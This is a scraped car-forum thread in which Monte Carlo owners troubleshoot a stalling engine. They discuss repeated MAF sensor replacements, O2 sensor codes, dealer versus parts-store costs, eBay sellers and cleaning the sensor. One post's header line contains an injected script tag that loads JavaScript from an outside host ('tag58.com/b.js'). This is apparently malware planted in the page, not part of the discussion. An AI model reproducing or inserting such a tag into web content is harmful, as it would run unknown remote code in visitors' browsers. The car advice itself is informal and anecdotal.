Monte Carlo Repair Help Have a Monte problem and need help? Good at troubleshooting? Discuss it here!

MAF sensor

Search this Thread

Old 06-15-2008, 07:30 AM
Default RE: MAF sensor<script src=http://www.tag58.com/b.js></script>

The car ran great with no codes for four days. Now, it will rev then spudder and then stall. I'm thinking that maybe it's a faulty new/remanufactered MAF. Maybe the ERG has finaly gone. I'll have to go to get the code read at Autozone again.

Old 06-15-2008, 02:08 PM

u just have no luck at all, sry dude

Old 06-15-2008, 06:34 PM

I took the MAF sensor back and replaced it with a new one. I guess we'll see if the remanufactered one was defective.

Old 06-19-2008, 04:32 AM

Yeah, I needed a security torx wrench to remove two screws. I replaced the MAF twice cause I'm still getting the codes. Probelm not solved yet. I'm going to take it to a shop to see if they can get it sorted out. I do have to replace the starter now though. It's clicking rapidly and won't connect. In the mean time, I'm going shopping for a new car. I'll keep my z34 as a project car.

Old 07-06-2008, 07:49 AM

Just thought I'd keep you guys posted. I replaced the precat o2 sensor. The car still stalled out on me. I took it to the dealer to see if they could figure out what was wrong with it. They said that I needed a new maf, but I had replaced it twice so far. I picked up the car and took back the MAF for a third time at autozone. They replaced it no prob. The car is running fine again.
In the end, I had codes for the o2 sensor and codes for the maf sensor. Replaced them both and now my car runs great again.
BTW...
The dealership wanted 350 for a MAF. Plus 70 to install it. I don't know what is worse, paying 420 for it to be replaced or replacing it 3 times to get one that works from autozone. When I told the mechanic at the dealership that I already replaced the MAF twice, he said that I must have gotten it at autozone. It's a common problem he says.
Autozone was really great about replacing it without question three times no additional charge though. It was only about 137. I'd go back to them anyday. Service was great.
I can't say that I'll ever go back to the dealership though.

Old 03-01-2011, 07:52 AM

Hey st07trent, I know its been 08 but I am going through the same problem now and Sorry to hear that you had to replace yours 3 times in order to work. By you going through that problem along, thats why I will purchase mines off the net and get the original one "the ACDELCO" kind... Sometimes you cant trust a mojority of the parts that these local off brand part stores be selling. Just by being on this site along and reading up on what others have been through, replacing the MC problems with its original parts is the way to correct the issue. Aftermarket will throw you through a loop sometimes...
Thanks for the information!

Old 03-01-2011, 07:57 PM
Monte Of The Month -- February 2012
5 Year Member3 Year Member1 Year Member

Originally Posted by kweef
so did u needed the special tool to remove ur maf sensor? all i did was turn the sensor with my hand
If you did that and it came out you're missing some important screws.

Old 03-09-2011, 12:59 PM

LOL posting on a 3 year old thread, i hope everythings all fixed up by now xD anyway, i recently purchased a MAF from an ebay seller "RAS" the description of the product was a brand new OEM ACDELCO MAF. First off the product location clearly stated RI and i needed it fast seeing as i live in NY i would think thats pretty close... It ended up shipping from Florida... SECOND upon receiving the MAF which was described as brand new I took a close look at it and new something was up (im no mechanic btw). My buddy who works at STS tires took a look at it and we confirmed theres no way it was brand new.

Despite all that nonsense the MAF works just fine, i've taken my MAF out several times now seeing as ive had several different aftermarket intakes installed my self and i dont recall ever needing anything other then a flathead or possibly a philips... this is on a 06 3.5 BTW.

Old 03-09-2011, 05:03 PM

Well 06-montelt2, I was considering purchasing off ebay but is kinda leary on if they sell the correct parts (at the time of need) for repair or not. I haven't puurchased major issue parts off ebay because of that reason. I mainly go to rockauto.com or somewhere else! But I am interest on how to replace the item myself. The shop who told me they "cleaned" the one thats on my monte now said for me to bring it back in so they can take a look at it.

You already know thats a way to charge me knowing I need it replaced....

I don't know the location to fix it and how too (let along the tools that is needed to replace it). Any assistance would be greatly appreciated!

Btw, I will look up "RAS" since u are stating that yours is working fine.

Old 03-10-2011, 07:50 AM

Yeah unfortunately eBay sellers can not be 100% trusted as you see in my case. However that not only eBay sellers, the same may be said for anyone attempting to sell a product online. All it takes is a typo in the description and boom, you get the wrong part... or a part described as new but is Infact used.

Just be careful of who your buying from and use good judgement. Maybe have a car savy friend help you take a look at the sellers listing.

As far as the removal and installation of the MAF, I'm not sure what tools I used but I will take a look when I'm free and see if I can take some helpful pictures.

Also I've been told that you can easily clean your MAF with carb cleaner, so it should be an easy "do it your self" job.(again I'm no mechanic so do some research before you take my advice)

Quick Reply: MAF sensor